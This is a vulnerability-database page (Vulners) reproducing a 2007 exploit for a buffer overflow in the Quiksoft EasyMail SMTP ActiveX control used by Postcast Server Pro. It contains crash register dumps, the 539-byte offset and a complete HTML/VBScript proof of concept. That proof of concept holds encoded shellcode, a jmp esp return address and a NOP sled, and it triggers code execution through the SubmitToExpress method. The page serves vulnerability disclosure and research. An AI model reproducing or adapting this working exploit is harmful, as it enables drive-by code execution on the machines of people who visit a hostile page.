Vulners
Lucene search
postcast-overflow.txt
`<!-- Postcast Server Pro 3.0.61 / Quiksoft EasyMail SMTP Object (emsmtp.dll 6.0.1)
remote buffer overflow exploit
(ie6 / xp sp2 version)
passing more than 539 chars to SubmitToExpress method:
EAX 00000400
ECX 0013DD24 ASCII "Error Creating File: AAAA ...
EDX C0403FFF
EBX FFFFFFFF
ESP 0013D5E4
EBP 0013DD08
ESI 41414141
EDI 0013DD24 ASCII "Error Creating File: AAAA ...
EIP 06986256 emsmtp.06986256
...
CMP DWORD PTR DS:[ESI+180],1
Access violation when reading 414142C1
seh overwrite follows:
EAX 00000000
ECX 41414141
EDX 7C9137D8 ntdll.7C9137D8
EBX 00000000
ESP 0013D214
EBP 0013D234
ESI 00000000
EDI 00000000
EIP 41414141
and if we pass a readable address to ESI:
A*539 + esi + A*99999
we fall in a more convenient
situation:
EAX 00000000
ECX 0013DF7C ASCII "AAAA...
EDX 001835D0
EBX 00000000
ESP 0013DF68 ASCII "AAAA...
EBP 41414141
ESI 05542A08
EDI 05586250 ASCII "AAAA...
EIP 41414141
Object safety report:
RegKey Safe for Script: true
RegKey Safe for Init: true
vendor urls: http://www.postcastserver.com/
http://www.quicksoftcorp.com/
rgod.
site: http://retrogod.altervista.org
->
<html>
<object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='EasyMailSMTPObj' /></object>
<script language='vbscript'>
'open calc.exe
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
esi = unescape("%01%01%01%01")
ebp = "bbbb"
nop = string(16,unescape("%90"))
eip = unescape("%78%2c%41%7e") '0x7E412C78 jmp esp user32.dll
bof = string(539,"A") + esi + ebp + eip + nop + scode
EasyMailSMTPObj.SubmitToExpress bof
</script>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Aug 2007 00:00Current
7.4High risk
Vulners AI Score7.4